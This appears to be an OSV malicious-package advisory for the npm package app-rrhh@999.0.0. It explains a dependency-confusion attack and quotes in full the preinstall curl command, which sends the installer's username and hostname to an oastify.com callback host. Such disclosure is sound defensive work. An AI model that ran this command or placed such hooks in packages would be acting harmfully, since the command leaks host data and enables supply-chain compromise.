app-rrhh@999.0.0
Vulnerability report · Last retrieved from osv.dev September 14, 2026 at 6:23 PM UTC
OSV ID
MAL-2026-16144
Ecosystem
npm
Summary
package.json declares a preinstall script that runs curl http://ebtld4p8aq3rl950g6jgn217aygp4fs4.oastify.com/$(whoami)/$(hostname) on npm install. The installer's OS username and hostname are embedded in the URL path and sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain, confirming code execution on the installing host and leaking installer identity data to an attacker-controlled destination. The package name app-rrhh at version 999.0.0 with a description referencing dependency confusion is consistent with a dependency-confusion attack shape designed to win resolution against an internal package of the same name.
Source: amazon-inspector (cda153823a2c046e4d97069c84961e1a8b302fc425e238fce36bd8a205d19b88)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.